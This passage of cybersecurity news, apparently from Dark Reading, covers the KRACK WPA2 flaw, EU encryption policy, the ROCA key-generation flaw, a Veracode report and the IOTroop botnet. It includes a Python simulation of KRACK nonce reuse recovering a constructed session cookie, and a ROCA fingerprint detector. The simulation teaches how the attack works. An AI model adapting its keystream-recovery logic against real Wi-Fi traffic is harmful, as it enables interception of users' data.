The Electronic Frontier Foundation (EFF) released a few calming observations. One is that any attack would need to have an active antenna within range of the targeted wireless network and would require the interception and delay of many packets traveling on the Wi-Fi networks. The EFF states it’s a complex task to trick a device and reset its encryption key as packets are actively being broadcast. Additionally, sensitive Wi-Fi traffic would not be affected by the WPA2 vulnerabilities if the site is encrypted with HTTPS.
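What makes the attack work, and why the EFF’s caveats apply, is easier to see with the handshake reduced to the piece that matters: a replayed message 3 makes the client reinstall the same key and restart its packet counter, so two frames get encrypted under the same keystream, and the attacker needs to be close enough to block message 4 and replay message 3 at the right moment. The added example below models that; it is not the researchers’ code or a real 802.11 stack, the HMAC-based keystream stands in for CCMP’s AES-CTR, the key and frames are constructed, and `patched` follows the fix of refusing to reinstall an already-installed key:

```python
import hashlib
import hmac

PN_BYTES = 6  # CCMP packet numbers are 48-bit; the nonce is derived from them


def keystream(ptk, packet_number, length):
    """Stand-in for CCMP's AES-CTR keystream (HMAC-SHA256 in counter mode here so
    the example runs without a crypto library). It shares the property that
    matters: the same (key, nonce) always yields the same bytes."""
    out, block = b"", 0
    while len(out) < length:
        msg = packet_number.to_bytes(PN_BYTES, "big") + block.to_bytes(4, "big")
        out += hmac.new(ptk, msg, hashlib.sha256).digest()
        block += 1
    return out[:length]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


class Supplicant:
    """Client side of the 4-way handshake, reduced to the part KRACK abuses."""

    def __init__(self, patched):
        self.patched = patched
        self.ptk = None
        self.pn = 0

    def on_msg3(self, ptk):
        # A retransmitted message 3 carries the same PTK. The fix is to refuse to
        # reinstall a key that is already in use, which keeps the counter moving.
        if self.patched and self.ptk == ptk:
            return
        self.ptk = ptk
        self.pn = 0  # the nonce reset: every reinstall restarts the counter

    def send(self, plaintext):
        self.pn += 1
        return self.pn, xor(plaintext, keystream(self.ptk, self.pn, len(plaintext)))


def run_attack(patched):
    """Attacker replays message 3 after the client has sent one frame whose
    plaintext it can guess. Returns the recovered secret bytes, or None."""
    ptk = hashlib.sha256(b"constructed PMK || nonces").digest()  # made-up session key
    sta = Supplicant(patched)
    sta.on_msg3(ptk)                               # genuine message 3: key installed
    guessable = b"GET /index.html HTTP/1.1\r\n"    # attacker knows or guesses this
    secret = b"Cookie: session=c0ffee1234\r\n"
    pn_a, ct_a = sta.send(guessable)
    sta.on_msg3(ptk)                               # replayed message 3 (msg 4 was blocked)
    pn_b, ct_b = sta.send(secret)
    if pn_a != pn_b:
        return None                                # distinct nonces: keystreams unrelated
    n = min(len(ct_a), len(ct_b))
    # c_a XOR c_b = p_a XOR p_b when the keystream repeats; XOR in the known p_a
    return xor(xor(ct_a[:n], ct_b[:n]), guessable[:n])
```

Nothing here touches the key itself, which is why HTTPS inside the Wi-Fi frame still protects the payload: the attacker recovers the encrypted HTTP bytes only when they are sent in the clear at the application layer.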

European Commission Discusses Encryption
The European Commission this week revisited the topic of encryption backdoors. The EC seemed to subtly say no to backdoors when releasing the statement that it would support law enforcement when it encountered encryption “without weakening encryption at a more general level or affecting a large or indiscriminate number of people.” However, its set of proposals to enhance law enforcement’s ability to obtain the electronic evidence it desires include “to support Europol to further develop its decryption capability.” It also stated that “in early 2018, the Commission will present proposals to provide for a legal framework to facilitate access to electronic evidence.”

ROCA Rocks
Another crypto vulnerability revealed this week is the Return of Coppersmith’s Attack (ROCA).

The ROCA flaw lies in the RSA key-generation routine of Infineon Technologies’ cryptographic chips, including the Trusted Platform Modules (TPMs) fitted to many PC motherboards, which are used to store encryption keys, passwords, and certificates, reports Kaspersky’s Threatpost.

Because the affected library generates RSA primes with a special structure, an attacker who knows only the public key can recover the private key by factoring the modulus in practical time, according to researchers with the Centre for Research on Cryptography and Security at Masaryk University in the Czech Republic, Enigma Bridge in Cambridge, United Kingdom, and Ca’ Foscari University of Venice, Italy, who discovered the vulnerability.

Once the private key has been compromised, attackers can impersonate the legitimate owner, decrypt sensitive messages, engage in signature forgery, and other attacks, according to a blog post by the researchers.

The researchers discovered the flaw while inspecting a large number of RSA keys generated by, and exported from, a smartcard manufacturer’s devices. The group notified Infineon Technologies of the vulnerability in February and also reached out to other affected parties, such as Microsoft, Google, HP, Lenovo, and Fujitsu, which have since released updates.

“We found and analyzed vulnerable keys in various domains including electronic citizen documents, authentication tokens, trusted boot devices, software package signing, TLS/HTTPS keys and PGP,” the researchers stated. “The currently confirmed number of vulnerable keys found is about 760,000 but possibly up to two to three magnitudes more are vulnerable.”

Researchers noted Friday that “Gemalto IDPrime .NET smart cards have been generating weak RSA keys since 2008 or earlier.” The researchers have published a test that tells from the public key alone whether it is vulnerable.
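The test is worth understanding because it needs nothing but the public modulus. The affected generator builds each prime as k*M + (65537^a mod M) for a primorial M, so N = p*q reduced modulo any odd prime dividing M is always a power of 65537, while a random modulus satisfies that for every prime only by vanishing chance. This added example re-implements that fingerprint check (it is not the researchers’ detector) and constructs a modulus with the vulnerable shape to show it firing; the constructed factors are not checked for primality, and the modulus is taken as an integer rather than parsed from a key file:

```python
# Odd primes whose product is the M the affected generator uses for 512-bit
# primes; the fingerprint only needs the primes themselves.
SMALL_PRIMES = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61,
                67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131,
                137, 139, 149, 151, 157, 163, 167]
GENERATOR = 65537


def subgroup(p):
    """Residues {65537^i mod p}: the only values a vulnerable N can take mod p."""
    seen, x = set(), 1
    while x not in seen:
        seen.add(x)
        x = (x * GENERATOR) % p
    return seen


SUBGROUPS = {p: subgroup(p) for p in SMALL_PRIMES}


def has_roca_fingerprint(n):
    """True when n mod p lies in <65537> for every small prime p."""
    return all((n % p) in SUBGROUPS[p] for p in SMALL_PRIMES)


def false_positive_rate():
    """Approximate probability that a random modulus passes the test by chance:
    per prime, the fraction of nonzero residues that are powers of 65537."""
    rate = 1.0
    for p in SMALL_PRIMES:
        rate *= len(SUBGROUPS[p]) / (p - 1)
    return rate


def structured_modulus(k1, a, k2, b):
    """Constructed modulus with the vulnerable shape. The two factors are not
    checked for primality here; the real generator loops until they are prime."""
    m = 1
    for p in SMALL_PRIMES:
        m *= p
    return (k1 * m + pow(GENERATOR, a, m)) * (k2 * m + pow(GENERATOR, b, m))
```

A positive result means the key should be replaced, not that it has already been factored: the factoring step is the expensive part, but for a key this test flags it is within reach.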


Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET’s …

Veracode: 75% Of Apps Have at Least One Vulnerability on Initial Scan

But developers not the only ones to blame, company says.

Application security continues to stink at many organizations, a new report from Veracode shows. But developers are not the only ones to blame. 

A failure by organizations to provide adequate security training, and by operational teams to address vulnerabilities in the production environment, has a big impact on application safety as well, the company said.

Veracode’s State of Software Security 2017 report is based on a code-level analysis of nearly 250 billion lines of code across 400,000 assessments conducted for 1,400 customers between April 2016 and March 2017.

The analysis showed more than 75% of the applications had one or more security vulnerabilities in code written by the development team on initial scan. About 12% had either a very-high-severity or a high-severity flaw on first scan. A startling 88% of Java applications, nearly nine out of 10, had at least one serious component-level flaw.

Veracode’s 2017 analysis found applications riddled with the same vulnerabilities that it uncovered last year. Information leakage flaws were most common and were present in more than 65% of the applications in which a security bug was found on initial scan. About 62% had cryptographic flaws while 56% had what Veracode described as code quality issues.

The Top 10 list of most frequent vulnerabilities on initial scan this year was identical to the list of top flaws last year and suggested that organizations are continuing to grapple with the same issues as they have been for quite some time.

“This year’s study included confirmation of trends we’ve seen for a while,” says Tim Jarrett, senior director of product marketing at Veracode. But there were also some surprises, he says.

The analysis, for instance, showed accelerating adoption of scanning earlier in the software development lifecycle, he says. The number of organizations doing at least 12 scans per year ticked up slightly, from 10.5% to 11.1%. Over 36%, though, continued to do just one scan per year.

There was also evidence that findings a policy prioritizes, higher-severity findings for instance, get fixed about twice as often as findings the policy does not prioritize, Jarrett says.

“We see evidence that scan frequencies are increasing, with a 3% to 4% increase in applications scanning at least daily,” he says. “[Such] frequent scanning is a sign of both early-lifecycle scanning and automated scanning.” But the majority of applications are still only being tested quarterly—or less frequently. “There’s plenty of room for improvement,” he notes.

Developers, according to Veracode, are not the only ones to blame for the continuing struggles with applications that many organizations appear to be having.

“It’s time to put the lazy developer trope to bed,” the company noted in its report.  “It may be easy for cybersecurity pros to blame AppSec woes on indifferent, uncaring, or slothful coders.” But the reality is very different, Veracode said.

Operational teams for instance have a part in undermining application security as well. When Veracode took a look at the overall hygiene of the production environments at the organizations in its survey the company found an “alarming number” of vulnerable servers running production applications.

When Veracode queried the public-facing web applications of the companies in its report, it discovered nearly 25% of the sites operating on web servers with one or more vulnerabilities with a CVSS rating of 6 or higher. Nearly 19% had web servers that were at least a decade old.

At many organizations developers also simply don’t get the security training they require. Few managers consider a software developer’s security skills as an important metric when evaluating performance, the application security vendor noted.

The Veracode report quoted a previous study the company had sponsored, in which 68% of developers and IT pros said their organizations did not provide adequate security training. Some 76% in that survey said they had not been required to take a single security course in college. Another study that Veracode conducted with analyst firm Enterprise Strategy Group showed a high level of awareness about the importance of security knowledge among development teams. But only 18% said security was the most important metric for measuring developers’ performance, Veracode said.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

IOTroop Botnet Hits Over a Million Organizations in Under 30 Days

The IoT botnet is expected to spread faster than Mirai.

A new IoT botnet dubbed IOTroop is expected to spread faster than Mirai because it has infected more than 1 million organizations since its discovery in late September, according to Check Point Software Technologies, which made the discovery.

IOTroop’s malware seeks out known vulnerabilities in IoT devices such as IP cameras, routers and NAS boxes, including devices running the GoAhead embedded web server and products from D-Link, TP-Link, AVTECH, NETGEAR, MikroTik, Linksys, Synology, and others. “The malware is able to spread faster than Mirai for it leverages numerous vulnerabilities, rather than only compromising devices that use default credentials,” says Maya Horowitz, Check Point’s group manager of Threat Intelligence.

Although IOTroop shares some technical aspects with Mirai, Check Point stresses it is a new botnet with a far more sophisticated attack campaign. IOTroop, for example, uses the Internet of Things devices it infects to scan for additional devices and report the findings back to the command-and-control server, Horowitz says. This helps IOTroop accelerate the speed at which it spreads, she notes. IOTroop takes advantage of users’ failure to patch existing vulnerabilities in their IoT devices, and of its ability to infect them without any human interaction.
